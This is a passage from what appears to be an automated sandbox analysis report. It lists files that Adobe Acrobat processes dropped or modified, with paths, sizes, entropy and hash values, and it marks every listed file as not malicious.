SHA-512: | 5C07357DFED6CF69044D2B94BAFA95A93BFD10C476E2ADC113315F5EF5A01B758153669175118B9202204DAA998E7B7B1C2B197D368E105813EA7D2293058A85 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 292 |
Entropy (8bit): | 5.197656834470103 |
Encrypted: | false |
SSDEEP: | 6:iO4q5SCUjL+q2Pwkn2nKuAl9OmbnIFUtSq5ScNs11Zmwsq5ScNsjLVkwOwkn2nKZ:7t/vYfHAahFUtrs11/RsF5JfHAaSJ |
MD5: | 0485D87F30F34FC05017E03ADD3664E2 |
SHA1: | 7934534CB0A951BA7A8E229BD7C6DA88F4BF4EA2 |
SHA-256: | BD25B811EFC1398FC61A9B324AEE07CC82239280B55DBC5E34DD7AE42A187976 |
SHA-512: | 9680D42A18B5FD4C2B4CAD58532103233E33306C97FA484D31AA474CD85AD464C3991CBCE47A789F0A5D438B841B2D008F1A38571A9C36199F5ED1797ABF9267 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 292 |
Entropy (8bit): | 5.197656834470103 |
Encrypted: | false |
SSDEEP: | 6:iO4q5SCUjL+q2Pwkn2nKuAl9OmbnIFUtSq5ScNs11Zmwsq5ScNsjLVkwOwkn2nKZ:7t/vYfHAahFUtrs11/RsF5JfHAaSJ |
MD5: | 0485D87F30F34FC05017E03ADD3664E2 |
SHA1: | 7934534CB0A951BA7A8E229BD7C6DA88F4BF4EA2 |
SHA-256: | BD25B811EFC1398FC61A9B324AEE07CC82239280B55DBC5E34DD7AE42A187976 |
SHA-512: | 9680D42A18B5FD4C2B4CAD58532103233E33306C97FA484D31AA474CD85AD464C3991CBCE47A789F0A5D438B841B2D008F1A38571A9C36199F5ED1797ABF9267 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb\LOG
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 336 |
Entropy (8bit): | 5.157312261739632 |
Encrypted: | false |
SSDEEP: | 6:iO4q5Se+L+q2Pwkn2nKuAl9Ombzo2jMGIFUtSq5SPl1Zmwsq5SPzLVkwOwkn2nK3:77i+vYfHAa8uFUtel1/8nV5JfHAa8RJ |
MD5: | CE73CC7EA287D3FEF452E314D1823714 |
SHA1: | CB5E5856A20923CCE1311A123EE5A56C76787CBB |
SHA-256: | 3C4C8AFC00B8FCD02085B91CBDBE539762C430FEE1BE27768E98F4E4DA421091 |
SHA-512: | AB802B54E2AB2BDCE6F47664DA412F6197849B91FE82D0305A4CA4D8EF46C35B7BCECB616C2919A20E3A1DE6A513FCA0CDEC117D1E775B194A7B16F31B6F6065 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb\LOG.old (copy)
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 336 |
Entropy (8bit): | 5.157312261739632 |
Encrypted: | false |
SSDEEP: | 6:iO4q5Se+L+q2Pwkn2nKuAl9Ombzo2jMGIFUtSq5SPl1Zmwsq5SPzLVkwOwkn2nK3:77i+vYfHAa8uFUtel1/8nV5JfHAa8RJ |
MD5: | CE73CC7EA287D3FEF452E314D1823714 |
SHA1: | CB5E5856A20923CCE1311A123EE5A56C76787CBB |
SHA-256: | 3C4C8AFC00B8FCD02085B91CBDBE539762C430FEE1BE27768E98F4E4DA421091 |
SHA-512: | AB802B54E2AB2BDCE6F47664DA412F6197849B91FE82D0305A4CA4D8EF46C35B7BCECB616C2919A20E3A1DE6A513FCA0CDEC117D1E775B194A7B16F31B6F6065 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Network\09eaf926-0090-4314-b0a8-b8b78d235f8e.tmp
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | modified |
Size (bytes): | 475 |
Entropy (8bit): | 4.962684752790978 |
Encrypted: | false |
SSDEEP: | 12:YH/um3RA8sqNXhsBdOg2HRAcaq3QYiubInP7E4T3y:Y2sRdsoXydMHRr3QYhbG7nby |
MD5: | C33DB7E65A5E7B85E5882CE9A8A7D983 |
SHA1: | 7D37BBDF5D69BEDE8DD88744D472F5E48B7F95D9 |
SHA-256: | 51A93AC693ABB47ED1F38DD2E42778ED2D8EF8165970A688371A5BC38E5A0544 |
SHA-512: | C1D0593AE3C84E9A439CFCBB1C21035C92AC3158E25D3275A9B98FBA3C01FF5E17EF60FC94AD47ADD330D5973A8F9CB67EADA93A8434D7C3E7FE0A518FDAA2C9 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Network\Network Persistent State (copy)
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 475 |
Entropy (8bit): | 4.962684752790978 |
Encrypted: | false |
SSDEEP: | 12:YH/um3RA8sqNXhsBdOg2HRAcaq3QYiubInP7E4T3y:Y2sRdsoXydMHRr3QYhbG7nby |
MD5: | C33DB7E65A5E7B85E5882CE9A8A7D983 |
SHA1: | 7D37BBDF5D69BEDE8DD88744D472F5E48B7F95D9 |
SHA-256: | 51A93AC693ABB47ED1F38DD2E42778ED2D8EF8165970A688371A5BC38E5A0544 |
SHA-512: | C1D0593AE3C84E9A439CFCBB1C21035C92AC3158E25D3275A9B98FBA3C01FF5E17EF60FC94AD47ADD330D5973A8F9CB67EADA93A8434D7C3E7FE0A518FDAA2C9 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage\000003.log
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 4320 |
Entropy (8bit): | 5.255327545222832 |
Encrypted: | false |
SSDEEP: | 96:etJCV4FAsszrNamjTN/2rjYMta02fDtehgO7BtTgo70z7jc:etJCV4FiN/jTN/2r8Mta02fEhgO73goJ |
MD5: | 1AD203F02E8447FA7D716F72F3EA01C3 |
SHA1: | B90A6D4403C8DCAAFFA1005B0028D57CBE76B42D |
SHA-256: | 6DC357315B2272AF097C706DCCB49CD9791C5DE8000B0C55D85985E56CE608CB |
SHA-512: | 72384C179606B18A4CE59A6559BF953718F9DB52FF499D43F2F73A41AF2EBCE80B5DCF33B3CDEDAE7D8241D7AF9DE893E4DB76C7585DC95756C090E1526702A0 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 324 |
Entropy (8bit): | 5.207625499540815 |
Encrypted: | false |
SSDEEP: | 6:iO4q5s+L+q2Pwkn2nKuAl9OmbzNMxIFUtSq551Zmwsq5zUaLVkwOwkn2nKuAl9Ob:7Qi+vYfHAa8jFUt31/LV5JfHAa84J |
MD5: | 03A16A5ABB7916B5A60D3A4E90D2A55C |
SHA1: | 6A95C2E1615452A130AD4BCE7635E27489133D9D |
SHA-256: | 55BC3BEC759EB6CF9DFA90EA457483B390CE867D2F1336268ECE30ED1A4D191C |
SHA-512: | C3811A6DA8E4AFDD6527DB88ABC16AE626412C0000D39A8A9F3850A1D2BBFFE5362E49026F15F9DDE53BD953B744CC04D0FC58F56F76AC97DC06FDFFE738A52C |
Malicious: | false |
Preview: |
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage\LOG.old (copy)
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 324 |
Entropy (8bit): | 5.207625499540815 |
Encrypted: | false |
SSDEEP: | 6:iO4q5s+L+q2Pwkn2nKuAl9OmbzNMxIFUtSq551Zmwsq5zUaLVkwOwkn2nKuAl9Ob:7Qi+vYfHAa8jFUt31/LV5JfHAa84J |
MD5: | 03A16A5ABB7916B5A60D3A4E90D2A55C |
SHA1: | 6A95C2E1615452A130AD4BCE7635E27489133D9D |
SHA-256: | 55BC3BEC759EB6CF9DFA90EA457483B390CE867D2F1336268ECE30ED1A4D191C |
SHA-512: | C3811A6DA8E4AFDD6527DB88ABC16AE626412C0000D39A8A9F3850A1D2BBFFE5362E49026F15F9DDE53BD953B744CC04D0FC58F56F76AC97DC06FDFFE738A52C |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 86016 |
Entropy (8bit): | 4.444853072470531 |
Encrypted: | false |
SSDEEP: | 384:SeZci5tWiBA7aDQPsknQ0UNCFOa14ocOUw6zyFzqFkdZ+EUTTcdUZ5yDQhJL:tZs3OazzU89UTTgUL |
MD5: | 82B3D7A4CC09549ABD02C4992C901A69 |
SHA1: | 0643518CBBF7914EF1A1250D07587375A072E3F6 |
SHA-256: | 7B58807C4195FDAA5FA6737DB401E2E9F334837248E39C2AD7588FE9AD5A5C56 |
SHA-512: | A5F88EEF2DAE20B48BE895279904CEAC1BD6E56AF18757BE5EA8740D1304A60F3E6C432C69CB91B3F2B6E1596E8B8A9F20E219375526E9D9DC6E0D147F09A7AB |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 8720 |
Entropy (8bit): | 2.212915428158365 |
Encrypted: | false |
SSDEEP: | 24:7+tgLnuwK9fqLrzkrFsgIFsxX3pALXmnHpkDGjmcxBSkomXk+2m9RFTsyg+wmf9S:7MMnC9fqvmFTIF3XmHjBoGGR+jMz+Lh8 |
MD5: | 42CB781883368379B65963CA4C10AF1C |
SHA1: | 3A5C267DFF7754034D3E07595719C9176453A648 |
SHA-256: | 1426CA4E4A66288AAE2BEBE695E6A690519CCEC026EA418664C5BBA972E86758 |
SHA-512: | 812C3BC7F5D82C1649EB7A20FA47E6947E5AE0472C47B8293319AE10DFBBFCB1E527FDFBB7AD33E2911A3888C491235EBCD9BC0698826EB88EA5BA035CF451EE |
Malicious: | false |
Preview: |
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\2D85F72862B55C4EADD9E66E06947F3D
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1391 |
Entropy (8bit): | 7.705940075877404 |
Encrypted: | false |
SSDEEP: | 24:ooVdTH2NMU+I3E0Ulcrgdaf3sWrATrnkC4EmCUkmGMkfQo1fSZotWzD1:ooVguI3Kcx8WIzNeCUkJMmSuMX1 |
MD5: | 0CD2F9E0DA1773E9ED864DA5E370E74E |
SHA1: | CABD2A79A1076A31F21D253635CB039D4329A5E8 |
SHA-256: | 96BCEC06264976F37460779ACF28C5A7CFE8A3C0AAE11A8FFCEE05C0BDDF08C6 |
SHA-512: | 3B40F27E828323F5B91F8909883A78A21C86551761F27B38029FAAEC14AF5B7AA96FB9F9CC93EE201B5EB1D0FEF17B290747E8B839D2E49A8F36C5EBF3C7C910 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 71954 |
Entropy (8bit): | 7.996617769952133 |
Encrypted: | true |
SSDEEP: | 1536:gc257bHnClJ3v5mnAQEBP+bfnW8Ctl8G1G4eu76NWDdB34w18R5cBWcJAm68+Q:gp2ld5jPqW8LgeulxB3fgcEfDQ |
MD5: | 49AEBF8CBD62D92AC215B2923FB1B9F5 |
SHA1: | 1723BE06719828DDA65AD804298D0431F6AFF976 |
SHA-256: | B33EFCB95235B98B48508E019AFA4B7655E80CF071DEFABD8B2123FC8B29307F |
SHA-512: | BF86116B015FB56709516D686E168E7C9C68365136231CC51D0B6542AE95323A71D2C7ACEC84AAD7DCECC2E410843F6D82A0A6D51B9ACFC721A9C84FDD877B5B |
Malicious: | false |
Preview: |
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\2D85F72862B55C4EADD9E66E06947F3D
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 192 |
Entropy (8bit): | 2.7529698674325394 |
Encrypted: | false |
SSDEEP: | 3:kkFkl+ZpEl/tfllXlE/HT8k7lZNNX8RolJuRdxLlGB9lQRYwpDdt:kKnZyeT8UpNMa8RdWBwRd |
MD5: | 29D863A7221F6E807D722513BBFB61D8 |
SHA1: | 6FD54E2141C9341068C22E74BA5E363D49C56736 |
SHA-256: | 362E081F96DF2DA66B9FB74C91085349B1C7A8DF2CF4540F602BC0C3D77FA8D7 |
SHA-512: | E2F8961CD1E01DC7B5A0A92D1FCF5680E2B3E1CD0F4A7AF84F165F5C30CF6C44B70E01255EDE815EE1AF8B698D1FBD7271CCB09E80A54595EB0C06F62E72AD0F |
Malicious: | false |
Preview: |
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | modified |
Size (bytes): | 328 |
Entropy (8bit): | 3.2269992301433126 |
Encrypted: | false |
SSDEEP: | 6:kKtpWtL9UswD8HGsL+N+SkQlPlEGYRMY9z+4KlDA3RUebT3:iiDImsLNkPlE99SNxAhUe/3 |
MD5: | 50DEC3751CE82762402652254249C2D2 |
SHA1: | 4CF894AFE004C539D705EEAE97FC165DC2971262 |
SHA-256: | 68EFF4214EB7E9AA08731EB8BEC274CCDCCE2CF713D729C722BAC9F5D30954C2 |
SHA-512: | 58F3C3EE88503A51B8345D14C320ABB1E6C917FBF99BA7275561AEFA3A9EFC541CC6EA8D0146C73A8B0273F2353FA97C3D03F72E71062716CD6D7EB22E5452FB |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1233 |
Entropy (8bit): | 5.233980037532449 |
Encrypted: | false |
SSDEEP: | 24:kk8id8HxPsMTtrid8OPgx4sMDHFidZxDWksMwEidMKRxCsMWaOtidMLgxT2sMW0l:pkxPhtgNgx4pyZxakazxCIK2gxap |
MD5: | 8BA9D8BEBA42C23A5DB405994B54903F |
SHA1: | FC1B1646EC8A7015F492AA17ADF9712B54858361 |
SHA-256: | 862DE2165B9D44422E84E25FFE267A5E1ADE23F46F04FC6F584C4943F76EB75C |
SHA-512: | 26AD41BB89AF6198515674F21B4F0F561DC9BDC91D5300C154065C57D49CCA61B4BA60E5F93FD17869BDA1123617F26CDA0EF39935A9C2805F930A3DB1956D5A |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1233 |
Entropy (8bit): | 5.233980037532449 |
Encrypted: | false |
SSDEEP: | 24:kk8id8HxPsMTtrid8OPgx4sMDHFidZxDWksMwEidMKRxCsMWaOtidMLgxT2sMW0l:pkxPhtgNgx4pyZxakazxCIK2gxap |
MD5: | 8BA9D8BEBA42C23A5DB405994B54903F |
SHA1: | FC1B1646EC8A7015F492AA17ADF9712B54858361 |
SHA-256: | 862DE2165B9D44422E84E25FFE267A5E1ADE23F46F04FC6F584C4943F76EB75C |
SHA-512: | 26AD41BB89AF6198515674F21B4F0F561DC9BDC91D5300C154065C57D49CCA61B4BA60E5F93FD17869BDA1123617F26CDA0EF39935A9C2805F930A3DB1956D5A |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1233 |
Entropy (8bit): | 5.233980037532449 |
Encrypted: | false |
SSDEEP: | 24:kk8id8HxPsMTtrid8OPgx4sMDHFidZxDWksMwEidMKRxCsMWaOtidMLgxT2sMW0l:pkxPhtgNgx4pyZxakazxCIK2gxap |
MD5: | 8BA9D8BEBA42C23A5DB405994B54903F |
SHA1: | FC1B1646EC8A7015F492AA17ADF9712B54858361 |
SHA-256: | 862DE2165B9D44422E84E25FFE267A5E1ADE23F46F04FC6F584C4943F76EB75C |
SHA-512: | 26AD41BB89AF6198515674F21B4F0F561DC9BDC91D5300C154065C57D49CCA61B4BA60E5F93FD17869BDA1123617F26CDA0EF39935A9C2805F930A3DB1956D5A |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 10880 |
Entropy (8bit): | 5.214360287289079 |
Encrypted: | false |
SSDEEP: | 192:SgAYm4DAv6oq6oCf6ocL6oz6o46ok6o16ok6oKls6oVtfZ6ojtou6o2ti16oGwX/:SV548vvqvSvivzv4vkv1vkvKlsvVtfZp |
MD5: | B60EE534029885BD6DECA42D1263BDC0 |
SHA1: | 4E801BA6CA503BDAE7E54B7DB65BE641F7C23375 |
SHA-256: | B5F094EFF25215E6C35C46253BA4BB375BC29D055A3E90E08F66A6FDA1C35856 |
SHA-512: | 52221F919AEA648B57E567947806F71922B604F90AC6C8805E5889AECB131343D905D94703EA2B4CEC9B0C1813DDA6EAE2677403F58D3B340099461BBCD355AE |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 10880 |
Entropy (8bit): | 5.214360287289079 |
Encrypted: | false |
SSDEEP: | 192:SgAYm4DAv6oq6oCf6ocL6oz6o46ok6o16ok6oKls6oVtfZ6ojtou6o2ti16oGwX/:SV548vvqvSvivzv4vkv1vkvKlsvVtfZp |
MD5: | B60EE534029885BD6DECA42D1263BDC0 |
SHA1: | 4E801BA6CA503BDAE7E54B7DB65BE641F7C23375 |
SHA-256: | B5F094EFF25215E6C35C46253BA4BB375BC29D055A3E90E08F66A6FDA1C35856 |
SHA-512: | 52221F919AEA648B57E567947806F71922B604F90AC6C8805E5889AECB131343D905D94703EA2B4CEC9B0C1813DDA6EAE2677403F58D3B340099461BBCD355AE |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\ACROBAT_READER_MASTER_SURFACEID
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 295 |
Entropy (8bit): | 5.389867216710428 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HXFSa73SyHVoZcg1vRcR0YbvFqoAvJM3g98kUwPeUkwRe9:YvXKXFX3EZc0vKNZGMbLUkee9 |
MD5: | 2920CFBAD022D4729284F53AF5087DF0 |
SHA1: | 18D7B01103CDD3BCE741109EBAF43DAFB3905E62 |
SHA-256: | 09CB6C45420EB76D72BD0C660CBCEAB642A29BC587546798802F4916B173D24C |
SHA-512: | 26F82045E14D7F929C527A56D5B48C8A70A14D4D7D64CFA8D7E0DF2012914DDB3712A13F957E325EFE2AE1D893FFEA23D624515B1094A198330C341E503B9263 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_FirstMile_Home_View_Surface
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 294 |
Entropy (8bit): | 5.341490478568483 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HXFSa73SyHVoZcg1vRcR0YbvFqoAvJfBoTfXpnrPeUkwRe9:YvXKXFX3EZc0vKNZGWTfXcUkee9 |
MD5: | 8B5C19EC0B708E908D328ECDE9615B47 |
SHA1: | E65F4303E7C6A425A02860D11496220828823AC6 |
SHA-256: | 6781933DF980510EE0AF7F273C29928BD384708A26DB162795A0469417872BF5 |
SHA-512: | 0F07FCFF4AD93D6948D8713A2D7BC5D45DCB999357A45B7F19141D2FE06DFDDD91240181F3F10B81B6AA1DB1EA2537D5DF13E3D0DD58F54DC14EE706AABC694B |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_FirstMile_Right_Sec_Surface
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 294 |
Entropy (8bit): | 5.32038133117924 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HXFSa73SyHVoZcg1vRcR0YbvFqoAvJfBD2G6UpnrPeUkwRe9:YvXKXFX3EZc0vKNZGR22cUkee9 |
MD5: | 54416E9677C6D2B7A430A4F0964CEFBB |
SHA1: | FB8DD296A4F3EDAB3FBA79E58142937E2594FA23 |
SHA-256: | A97A75D10EA2FABF315D0FEFF6339FE23D454504776D9511744F861B4CB1B799 |
SHA-512: | 27B303F52089F169DB02009DC573DA62889544748872654601404C3424EA5D0CE524D9C562045FF3BCB8B26720BBF2B09029E9378CBBF2BFAADD5A8421CBB6CA |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_READER_LAUNCH_CARD
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 285 |
Entropy (8bit): | 5.377807681866754 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HXFSa73SyHVoZcg1vRcR0YbvFqoAvJfPmwrPeUkwRe9:YvXKXFX3EZc0vKNZGH56Ukee9 |
MD5: | 363CB97C3B76149F4F5446F4F3B51BFB |
SHA1: | DEAD9E116C766C08BC4E9F5F443F36FDC8804414 |
SHA-256: | F899DF9060E7D01F98624875555AC020A503F34B492393CA1D64A56959961CB6 |
SHA-512: | 2F4E9499CEAC8BBF030BB8890663DB54A338853F7C785B1379634273C9D05E4D888BBA5D5CE6005B5A5515770957E19489AB11CBDA1CC36ABC3B16F586D7B3A4 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Convert_LHP_Banner
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1123 |
Entropy (8bit): | 5.6936334156865405 |
Encrypted: | false |
SSDEEP: | 24:Yv6X13EzvNpLgE9cQx8LennAvzBvkn0RCmK8czOCCSr:YvIMVhgy6SAFv5Ah8cv/r |
MD5: | 2E895CB13B8B944005490C9562CB0674 |
SHA1: | 7E46738F9BC0628374D48EE89A1200C81D29A36F |
SHA-256: | 8B73B398003AEB72D7DFD58DC949010437EB9F9B7E6A43621300DD4C10702E29 |
SHA-512: | CE2CAC3F3228C5EF46CF37D7A4952856E6C135895F87FE046B66714AAD1E3837A302084B87DC0FF6EB184D693D1CE124B4371B97235BAE1D41320FF17C1C2087 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Disc_LHP_Banner
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 289 |
Entropy (8bit): | 5.327568983563003 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HXFSa73SyHVoZcg1vRcR0YbvFqoAvJf8dPeUkwRe9:YvXKXFX3EZc0vKNZGU8Ukee9 |
MD5: | F2A86597DBEB6AACDBD69AADB9106990 |
SHA1: | 7A9F16850BF89B655F00E3EB4D33D774CD241892 |
SHA-256: | E0C6D73D04E105202AE7E3B992915BE3B60474956F22C29AE755FC4E07D0670D |
SHA-512: | E14CA52919DAFA9C846D2B31B82F7A095D253F584D4BEC9E19D259F226543101C1D9BD7352E96C0D38F2157911DBDEDFC62A10CA6D25ADEB1AECFB10A7531D4A |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Disc_LHP_Retention
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 292 |
Entropy (8bit): | 5.331786172982355 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HXFSa73SyHVoZcg1vRcR0YbvFqoAvJfQ1rPeUkwRe9:YvXKXFX3EZc0vKNZGY16Ukee9 |
MD5: | CF1A2C255261193FE3A7097A27857CC5 |
SHA1: | 2BA7C78AB4D6F665203F6F863D28E53EF792B876 |
SHA-256: | C2A7ADD454230896A3D6DE5AB0BBFC98FD40F9067CFED3FF5B3589F7375048B5 |
SHA-512: | AA3435C0675DD6DB95993AAB4BA5E920CA2A43403F6F8A94B895D13D15C3AED85B0EF0936C49E8C9A6514E3BB86DC9F8A6D12965F116B09DD389F66C5A7E1E31 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Edit_LHP_Banner
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 289 |
Entropy (8bit): | 5.336821383233899 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HXFSa73SyHVoZcg1vRcR0YbvFqoAvJfFldPeUkwRe9:YvXKXFX3EZc0vKNZGz8Ukee9 |
MD5: | 916FAAA77CBCBF5FB0102A202C2A3A68 |
SHA1: | ADF8F1EC82D26B1E94D845F49939619A049E9090 |
SHA-256: | 37C840ABCF31C92F5F3CCAC72E278C8FDEE63EC922AE0770CE4329BAD3189B8C |
SHA-512: | ABEEC1ADF414ACE395D30D524EB2031560A3FC75E11EC5C2C9332B9A7CD83F669297F9F95D93F69E30C3292A866FB0D3B5352A46345F898A3DD0551A8D45AF7B |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Home_LHP_Trial_Banner
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 295 |
Entropy (8bit): | 5.352086718311356 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HXFSa73SyHVoZcg1vRcR0YbvFqoAvJfzdPeUkwRe9:YvXKXFX3EZc0vKNZGb8Ukee9 |
MD5: | 8464A2E8EDEFA7A80E5DA1BD071D3A05 |
SHA1: | A06A12354E712D015A0DDE4B2C14956138BAFD7C |
SHA-256: | DFEF0AAD7177277027A64E1F952B87B71B4A2B33F39CF2EC9C05A0483F1F4115 |
SHA-512: | 951D045E35B82928FADB34CB40E59CA9BC9031001DF94C99843EBA533B56CAD4DFBB86411D2BF10DF34EF3BFC54921A69B25185B5AD35BDEB38135D31B4D9E5C |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_More_LHP_Banner
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 289 |
Entropy (8bit): | 5.333409833349253 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HXFSa73SyHVoZcg1vRcR0YbvFqoAvJfYdPeUkwRe9:YvXKXFX3EZc0vKNZGg8Ukee9 |
MD5: | 0B2B379C7792F0C41AC20D8EC9F37215 |
SHA1: | D66193419A2ECE9BADDA5CFDD40E82DB71958B46 |
SHA-256: | 64D2E625916CFFA566EC8AEFCE29CADC37BEEDD85F910E5FAB3A273852A1D53A |
SHA-512: | 3A92DA3072FBB8009E141C64CEA06E6FB7A0EF4641CD8BDA9AD39EC7B5B2DE83CA9BBCB7DC1C08A6AF3713D457FAD6AAF20BF13774DE0426C8AC2E48C49C918E |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 284 |
Entropy (8bit): | 5.3197307059304455 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HXFSa73SyHVoZcg1vRcR0YbvFqoAvJf+dPeUkwRe9:YvXKXFX3EZc0vKNZG28Ukee9 |
MD5: | E6E494E3AD065184282C7CEFC677D514 |
SHA1: | FA08D341FB6B41277908C20CC6A008B0BFEDCD97 |
SHA-256: | 451F591B5656D611ABC513D40C6C7C50E3B8314C7FA9F8494068F775459739E0 |
SHA-512: | A650B0AF965700B1F88EA4B987C3D2CE0E58406896FA2A9D9E222F9E8FD8138512610630C050A24FD5859066317931B284D49885B163F5E09744543634FE3A20 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_RHP_Intent_Banner
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
